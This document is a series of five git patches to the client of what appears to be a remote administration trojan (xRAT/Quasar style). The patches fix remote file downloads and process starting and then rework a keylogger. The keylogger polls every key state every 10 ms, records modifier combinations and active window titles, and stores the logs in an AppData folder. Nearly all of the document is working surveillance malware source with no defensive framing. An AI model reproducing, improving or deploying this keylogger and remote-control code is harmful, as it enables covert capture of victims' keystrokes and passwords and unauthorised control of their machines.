From e50ea69d4346cee2997d2033d56fe13ec9f27bf4 Mon Sep 17 00:00:00 2001 From: MaxXor Date: Tue, 5 May 2015 09:19:08 +0200 Subject: [PATCH 1/5] Fixed crash when downloading files over 2MB (#75) --- Client/Core/Commands/CommandHandler.cs | 35 +++++++++++++++++--------- Client/Core/Helper/FileSplit.cs | 2 +- Server/Core/Helper/FileSplit.cs | 2 +- 3 files changed, 25 insertions(+), 14 deletions(-) diff --git a/Client/Core/Commands/CommandHandler.cs b/Client/Core/Commands/CommandHandler.cs index cb76c55b..4b09987b 100644 --- a/Client/Core/Commands/CommandHandler.cs +++ b/Client/Core/Commands/CommandHandler.cs @@ -312,7 +312,8 @@ namespace xClient.Core.Commands Process.GetProcessById(command.PID).Kill(); } catch - { } + { + } finally { HandleGetProcesses(new Packets.ServerPackets.GetProcesses(), client); @@ -321,19 +322,28 @@ namespace xClient.Core.Commands public static void HandleStartProcess(Packets.ServerPackets.StartProcess command, Client client) { - if (!string.IsNullOrEmpty(command.Processname)) + if (string.IsNullOrEmpty(command.Processname)) { - try + new Packets.ClientPackets.Status("Process could not be started!").Execute(client); + return; + } + + try + { + ProcessStartInfo startInfo = new ProcessStartInfo { - ProcessStartInfo startInfo = new ProcessStartInfo { UseShellExecute = true, FileName = command.Processname }; - Process.Start(startInfo); - } - catch - { } - finally - { - HandleGetProcesses(new Packets.ServerPackets.GetProcesses(), client); - } + UseShellExecute = true, + FileName = command.Processname + }; + Process.Start(startInfo); + } + catch + { + new Packets.ClientPackets.Status("Process could not be started!").Execute(client); + } + finally + { + HandleGetProcesses(new Packets.ServerPackets.GetProcesses(), client); } } @@ -451,6 +461,7 @@ namespace xClient.Core.Commands for (int currentBlock = 0; currentBlock < srcFile.MaxBlocks; currentBlock++) { + if (!client.Connected) return; if (_canceledDownloads.ContainsKey(command.ID)) return; byte[] block; diff --git a/Client/Core/Helper/FileSplit.cs b/Client/Core/Helper/FileSplit.cs index 1354585a..89a2a23b 100644 --- a/Client/Core/Helper/FileSplit.cs +++ b/Client/Core/Helper/FileSplit.cs @@ -7,7 +7,7 @@ namespace xClient.Core.Helper { private int _maxBlocks; - private const int MAX_PACKET_SIZE = Client.MAX_PACKET_SIZE - Client.HEADER_SIZE - 1; + private const int MAX_PACKET_SIZE = Client.MAX_PACKET_SIZE - Client.HEADER_SIZE - (1024 * 2); public string Path { get; private set; } public string LastError { get; private set; } diff --git a/Server/Core/Helper/FileSplit.cs b/Server/Core/Helper/FileSplit.cs index 172bd73b..87d9638f 100644 --- a/Server/Core/Helper/FileSplit.cs +++ b/Server/Core/Helper/FileSplit.cs @@ -7,7 +7,7 @@ namespace xServer.Core.Helper { private int _maxBlocks; - private const int MAX_PACKET_SIZE = Client.MAX_PACKET_SIZE - Client.HEADER_SIZE - 1; + private const int MAX_PACKET_SIZE = Client.MAX_PACKET_SIZE - Client.HEADER_SIZE - (1024 * 2); public string Path { get; private set; } public string LastError { get; private set; } From 725a841db112ae23212b4e130bb6baf42db6c307 Mon Sep 17 00:00:00 2001 From: d3agle Date: Tue, 5 May 2015 02:52:07 -0500 Subject: [PATCH 2/5] Keylogger cleanup removed f1-f11 keys since they are not handled moved calling the keyboard layout to FromKeys method when a key is handled so its not being called every 10ms --- Client/Core/Keylogger/Logger.cs | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/Client/Core/Keylogger/Logger.cs b/Client/Core/Keylogger/Logger.cs index a2938d4c..11d30e93 100644 --- a/Client/Core/Keylogger/Logger.cs +++ b/Client/Core/Keylogger/Logger.cs @@ -97,8 +97,8 @@ namespace xClient.Core.Keylogger _enumValues.Add(i); } - for (int i = 65; i <= 122; i++) - //65-90 are the key codes for A-Z, skip 91-94 which are LWin + RWin keys, Applications and sleep key, 95-111 numpad keys, 112-122 are F1-F11 keys + for (int i = 65; i <= 111; i++) + //65-90 are the key codes for A-Z, skip 91-94 which are LWin + RWin keys, Applications and sleep key, 95-111 numpad keys { if (i >= 91 && i <= 94) continue; @@ -130,8 +130,6 @@ namespace xClient.Core.Keylogger { _hWndTitle = GetActiveWindowTitle(); //Get active thread window title - _activeKeyboardLayout = GetActiveKeyboardLayout(); //Get active thread keyboard layout - foreach (int i in _enumValues) //Loop through our enumValues list populated with the keys we want to log { if (GetAsyncKeyState(i) == -32767) //GetAsycKeyState returns -32767 to indicate keypress @@ -259,7 +257,7 @@ namespace xClient.Core.Keylogger var sb = new StringBuilder(10); - return ToUnicodeEx(keys, 0, keyStates, sb, sb.Capacity, 0, _activeKeyboardLayout) == 1 + return ToUnicodeEx(keys, 0, keyStates, sb, sb.Capacity, 0, GetActiveKeyboardLayout()) == 1 ? (char?) sb[0] : null; //Get the appropriate unicode character from the state of keyboard and from the Keyboard layout (language) of the active thread From 2b6ca6eda8231c82a51f741dbe1aaf490a732a16 Mon Sep 17 00:00:00 2001 From: MaxXor Date: Tue, 5 May 2015 09:56:19 +0200 Subject: [PATCH 3/5] Removed unused variable --- Client/Core/Keylogger/Logger.cs | 1 - 1 file changed, 1 deletion(-) diff --git a/Client/Core/Keylogger/Logger.cs b/Client/Core/Keylogger/Logger.cs index 11d30e93..edafcd01 100644 --- a/Client/Core/Keylogger/Logger.cs +++ b/Client/Core/Keylogger/Logger.cs @@ -71,7 +71,6 @@ namespace xClient.Core.Keylogger "\\Logs\\"; private readonly List _enumValues; - private IntPtr _activeKeyboardLayout; private readonly System.Timers.Timer _timerLogKeys; private readonly System.Timers.Timer _timerFlush; From 4d5fb29c178d98a3f9db3c2e0c201948778b400d Mon Sep 17 00:00:00 2001 From: d3agle Date: Tue, 5 May 2015 03:01:14 -0500 Subject: [PATCH 4/5] Keylogger cleanup Moved GetActiveWindowTitle so it's not called every 10ms --- Client/Core/Keylogger/Logger.cs | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Client/Core/Keylogger/Logger.cs b/Client/Core/Keylogger/Logger.cs index edafcd01..f83118d1 100644 --- a/Client/Core/Keylogger/Logger.cs +++ b/Client/Core/Keylogger/Logger.cs @@ -127,12 +127,12 @@ namespace xClient.Core.Keylogger private void timerLogKeys_Elapsed(object sender, System.Timers.ElapsedEventArgs e) { - _hWndTitle = GetActiveWindowTitle(); //Get active thread window title - foreach (int i in _enumValues) //Loop through our enumValues list populated with the keys we want to log { if (GetAsyncKeyState(i) == -32767) //GetAsycKeyState returns -32767 to indicate keypress { + _hWndTitle = GetActiveWindowTitle(); //Get active thread window title + if (_hWndTitle != null) { if (_hWndTitle != _hWndLastTitle) From e07eeeb5113deecc1244b0b50a4d21e687be9023 Mon Sep 17 00:00:00 2001 From: MaxXor Date: Tue, 5 May 2015 22:40:34 +0200 Subject: [PATCH 5/5] Reworked Keylogger Fixed #79 Fixed #80 --- Client/Core/Keylogger/Logger.cs | 186 +++++++++++++++++++++++--------- 1 file changed, 138 insertions(+), 48 deletions(-) diff --git a/Client/Core/Keylogger/Logger.cs b/Client/Core/Keylogger/Logger.cs index f83118d1..6ddd2c5e 100644 --- a/Client/Core/Keylogger/Logger.cs +++ b/Client/Core/Keylogger/Logger.cs @@ -3,10 +3,20 @@ using System.Collections.Generic; using System.IO; using System.Runtime.InteropServices; using System.Text; +using System.Threading; using System.Windows.Forms; namespace xClient.Core.Keylogger { + public class KeyData + { + public short Value { get; set; } + public bool ShitKey { get; set; } + public bool CapsLock { get; set; } + public bool ControlKey { get; set; } + public bool AltKey { get; set; } + } + public class Logger { #region "WIN32API" @@ -55,6 +65,22 @@ namespace xClient.Core.Keylogger } } + private static bool ControlKey + { + get + { + return Convert.ToBoolean(GetAsyncKeyState(Keys.ControlKey) & 0x8000); //Returns true if shiftkey is pressed + } + } + + private static bool AltKey // not working + { + get + { + return Convert.ToBoolean(GetAsyncKeyState(Keys.Menu) & 0x8000); //Returns true if shiftkey is pressed + } + } + private static bool CapsLock { get @@ -63,14 +89,15 @@ namespace xClient.Core.Keylogger } } - private StringBuilder _keyBuffer; + private StringBuilder _logFileBuffer; private string _hWndTitle; private string _hWndLastTitle; private readonly string _filePath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Logs\\"; - private readonly List _enumValues; + private readonly List _enumValues; + private volatile List _keyBuffer; private readonly System.Timers.Timer _timerLogKeys; private readonly System.Timers.Timer _timerFlush; @@ -81,7 +108,9 @@ namespace xClient.Core.Keylogger WriteFile(); - _enumValues = new List() + _keyBuffer = new List(); + + _enumValues = new List() //Populate enumValues list with the Virtual Key Codes of the keys we want to log { 8, //Backspace @@ -91,90 +120,151 @@ namespace xClient.Core.Keylogger 46, //Delete }; - for (int i = 48; i <= 57; i++) //0-9 regular + for (short i = 48; i <= 57; i++) //0-9 regular { _enumValues.Add(i); } - for (int i = 65; i <= 111; i++) - //65-90 are the key codes for A-Z, skip 91-94 which are LWin + RWin keys, Applications and sleep key, 95-111 numpad keys + for (short i = 65; i <= 122; i++) + //65-90 A-Z + //91-92 LWin + RWin key + //skip 93-94 Applications and sleep key + //95-111 numpad keys, 112-122 F1-F11 keys { - if (i >= 91 && i <= 94) - continue; - + if (i >= 93 && i <= 94) continue; _enumValues.Add(i); } - for (int i = 186; i <= 192; i++) + for (short i = 186; i <= 192; i++) //186 VK_OEM_1, 187 VK_OEM_PLUS, 188 VK_OEM_COMMA, 189 VK_OEM_MINUS, 190 VK_OEM_PERIOD, 191 VK_OEM_2, 192 VK_OEM_3 { _enumValues.Add(i); } - for (int i = 219; i <= 222; i++) //219 VK_OEM_4, 220 VK_OEM_5, 221 VK_OEM_6, 222 VK_OEM_7 + for (short i = 219; i <= 222; i++) //219 VK_OEM_4, 220 VK_OEM_5, 221 VK_OEM_6, 222 VK_OEM_7 { _enumValues.Add(i); } this._timerLogKeys = new System.Timers.Timer {Enabled = false, Interval = 10}; this._timerLogKeys.Elapsed += this.timerLogKeys_Elapsed; + + EmptyKeyBuffer(); this._timerFlush = new System.Timers.Timer {Enabled = false, Interval = flushInterval}; this._timerFlush.Elapsed += this.timerFlush_Elapsed; - this._keyBuffer = new StringBuilder(); + this._logFileBuffer = new StringBuilder(); + } + + private string HighlightpecialKey(string name) + { + return string.Format("[{0}]", name); + } + + private void EmptyKeyBuffer() + { + new Thread(() => + { + while (this.Enabled) + { + Thread.Sleep(500); + int j = 0; + KeyData[] keybuffer = new KeyData[_keyBuffer.Count]; + _keyBuffer.CopyTo(keybuffer); + foreach (var k in keybuffer) + { + switch (k.Value) + { + case 8: + _logFileBuffer.Append(HighlightpecialKey("Back")); + break; + case 9: + _logFileBuffer.Append(HighlightpecialKey("Tab")); + break; + case 13: + _logFileBuffer.Append(HighlightpecialKey("Enter")); + break; + case 32: + _logFileBuffer.Append(" "); + break; + case 46: + _logFileBuffer.Append(HighlightpecialKey("Del")); + break; + case 91: + case 92: + _logFileBuffer.Append(HighlightpecialKey("Win")); + break; + case 112: + case 113: + case 114: + case 115: + case 116: + case 117: + case 118: + case 119: + case 120: + case 121: + case 122: + _logFileBuffer.Append(HighlightpecialKey("F" + (k.Value - 111))); + break; + default: + if (_enumValues.Contains(k.Value)) + { + if (k.AltKey && k.ControlKey && k.ShitKey) + { + _logFileBuffer.Append(HighlightpecialKey("SHIFT-CTRL-ALT-" + FromKeys(k.Value, k.ShitKey, k.CapsLock))); + } + if (k.AltKey && k.ControlKey && !k.ShitKey) + { + _logFileBuffer.Append(HighlightpecialKey("CTRL-ALT-" + FromKeys(k.Value, k.ShitKey, k.CapsLock))); + } + if (k.AltKey && !k.ControlKey) + { + _logFileBuffer.Append(HighlightpecialKey("ALT-" + FromKeys(k.Value, k.ShitKey, k.CapsLock))); + } + if (k.ControlKey && !k.AltKey) + { + _logFileBuffer.Append(HighlightpecialKey("CTRL-" + FromKeys(k.Value, k.ShitKey, k.CapsLock))); + } + else + { + _logFileBuffer.Append(FromKeys(k.Value, k.ShitKey, k.CapsLock)); + } + } + break; + } + j++; + } + _keyBuffer.RemoveRange(0, j); + } + }).Start(); } private void timerLogKeys_Elapsed(object sender, System.Timers.ElapsedEventArgs e) { - foreach (int i in _enumValues) //Loop through our enumValues list populated with the keys we want to log + foreach (short i in _enumValues) //Loop through our enumValues list populated with the keys we want to log { if (GetAsyncKeyState(i) == -32767) //GetAsycKeyState returns -32767 to indicate keypress { + _keyBuffer.Add(new KeyData() {CapsLock = CapsLock, ShitKey = ShiftKey, ControlKey = ControlKey, AltKey = AltKey, Value = i}); _hWndTitle = GetActiveWindowTitle(); //Get active thread window title - if (_hWndTitle != null) { - if (_hWndTitle != _hWndLastTitle) - //Only write title to log if a key is pressed that we support in our enumValues list, we don't want to write the title to a log with blank characters to follow + if (_hWndTitle != _hWndLastTitle && _enumValues.Contains(i)) + //Only write title to log if a key is pressed that we support { _hWndLastTitle = _hWndTitle; - - _keyBuffer.Append("

[" + _hWndTitle + "]
"); + _logFileBuffer.Append("

[" + _hWndTitle + "]
"); } } - - switch (i) - { - case 8: - _keyBuffer.Append("[Back]"); - return; - case 9: - _keyBuffer.Append("[Tab]"); - return; - case 13: - _keyBuffer.Append("[Enter]
"); - return; - case 32: - _keyBuffer.Append(" "); - return; - case 46: - _keyBuffer.Append("[Del]"); - return; - } - - if (_enumValues.Contains(i)) //If our enumValues list contains to current key pressed - { - _keyBuffer.Append(FromKeys(i, ShiftKey, CapsLock)); - return; - } } } } private void timerFlush_Elapsed(object sender, System.Timers.ElapsedEventArgs e) { - if (_keyBuffer.Length > 0) + if (_logFileBuffer.Length > 0) WriteFile(); } @@ -204,13 +294,13 @@ namespace xClient.Core.Keylogger "Log created on " + DateTime.Now.ToString("dd.MM.yyyy HH:mm") + "
"); - if (_keyBuffer.Length > 0) - sw.Write(_keyBuffer); + if (_logFileBuffer.Length > 0) + sw.Write(_logFileBuffer); _hWndLastTitle = string.Empty; } else - sw.Write(_keyBuffer); + sw.Write(_logFileBuffer); } catch { @@ -222,7 +312,7 @@ namespace xClient.Core.Keylogger { } - _keyBuffer = new StringBuilder(); + _logFileBuffer = new StringBuilder(); } private string GetActiveWindowTitle()